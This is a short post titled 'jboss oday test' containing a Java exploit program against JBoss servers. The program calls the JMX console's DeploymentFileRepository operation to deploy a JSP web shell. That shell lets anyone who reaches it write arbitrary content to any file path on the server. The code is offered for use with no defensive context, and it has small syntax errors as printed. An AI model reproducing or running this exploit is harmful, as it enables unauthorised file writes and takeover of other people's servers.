jboss oday test

detail: this file's function is to be used to create a new jsp file with jboss location[JBOSS_HOME\server\default\deploy\management\console-mgr.sar\web-console.war\]

HTTP access address

test file source

  1 package  jp.co.nec.nhm.client.multip.mm;
  3 import  java.io.IOException;
  4 import  java.net.URLEncoder;
  6 import  javax.xml.ws.http.HTTPException;
  8 import  org.apache.commons.httpclient.HttpClient;
  9 import  org.apache.commons.httpclient.methods.PostMethod;
 10 import  org.apache.commons.httpclient.methods.StringRequestEntity;
 11 import  org.apache.commons.httpclient.params.HttpClientParams;
 13 public   class  JbossTest  {
 14    /** *//**
 15     * @param args
 16     */

 17    public static void main(String[] args) throws Throwable {
 18        jbossTest();
 19    }

 21    private static void jbossTest() throws Throwable {
 22        // TODO Auto-generated method stub
 23        final String port = "9090";
 24        final String host = "";
 25        final String jspName = "Code";
 26        final String blind = URLEncoder.encode(getInfos(), "utf-8");
 28        StringBuffer url = new StringBuffer();
 29        url.append("http://");
 30        url.append(host);
 31        url.append(":");
 32        url.append(port);
 33        url.append("/jmx-console/HtmlAdaptor?" +
 34                        "action=invokeOp" +
 35                        "&name=jboss.admin%3Aservice%3DDeploymentFileRepository" +
 36                        "&methodIndex=5" +
 37                        "&arg0=console-mgr.sar/web-console.war/");
 38        url.append("&arg1=");
 39        url.append(jspName);
 40        url.append("&arg2=.jsp");
 41        url.append("&arg3=");
 42        url.append(blind);
 43        url.append("&arg4=True");
 44        System.out.println(url.toString());
 45        System.out.println(post(url.toString(), ""));
 46        // if (ret == 200) {
 47        // System.out.println(post("http://" + host + ":" + port +
 48        // "/web-console/Code.jsp",""));
 49        // }
 50    }

 52    public static int post(String url, String body) throws IOException,
 53            HTTPException {
 54        int retCode = -1;
 55        HttpClientParams hcp = new HttpClientParams();
 56        hcp.setSoTimeout(5000);
 57        HttpClient client = new HttpClient(hcp);
 58        PostMethod post = new PostMethod(url);
 59        try {
 60            if (body != null{
 61                StringRequestEntity e = new StringRequestEntity(body, null,
 62                        null);
 63                post.setRequestHeader("Content-type""text/xml");
 64                post.setRequestEntity(e);
 65                retCode = client.executeMethod(post);
 67                System.out.println(retCode);
 69                System.out.println(post.getResponseBodyAsString());
 71            }

 72        }
 finally {
 73            if (post != null{
 74                post.releaseConnection();
 75            }

 76        }

 77        return retCode;
 78    }

 80    public static String getInfos() {
 81        String aa = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>"
 82                + "<jsp:directive.page import=\"java.io.File\"/>"
 83                + "<jsp:directive.page import=\"java.io.OutputStream\"/>"
 84                + "<jsp:directive.page import=\"java.io.FileOutputStream\"/>"
 85                + "<html>"
 86                + "<head>"
 87                + "<title>code</title>"
 88                + "<meta http-equiv=\"keywords\" content=\"code\">"
 89                + "<meta http-equiv=\"description\" content=\"code\">"
 90                + "</head>"
 91                + "<%"
 92                + "int i=0;"
 93                + "String method=request.getParameter(\"act\");"
 94                + "if(method!=null&&method.equals(\"up\")){"
 95                + "String url=request.getParameter(\"url\");"
 96                + "String text=request.getParameter(\"text\");"
 97                + "File f=new File(url);"
 98                + "if(f.exists()){"
 99                + "f.delete();"
100                + "}"
101                + "try{"
102                + "OutputStream o=new FileOutputStream(f);"
103                + "o.write(text.getBytes());"
104                + "o.close();"
105                + "}catch(Exception e){"
106                + "i++;"
107                + "%>"
108                + "upload unsuccessful"
109                + "<%"
110                + "}"
111                + "}"
112                + "if(i==0){"
113                + "%>"
114                + "upload successful"
115                + "<%"
116                + "}"
117                + "%>"
118                + "<body>"
119                + "<form action='?act=up' method='post'>"
120                + "<input size=\"100\" value=\"<%=application.getRealPath(\"/\"%>\" name=\"url\"><br>"
121                + "<textarea rows=\"20\" cols=\"80\" name=\"text\">code</textarea><br>"
122                + "<input type=\"submit\" value=\"up\" name=\"text\"/>"
123                + "</form>" + "</body>" + "</html>";
124        return aa;
125    }



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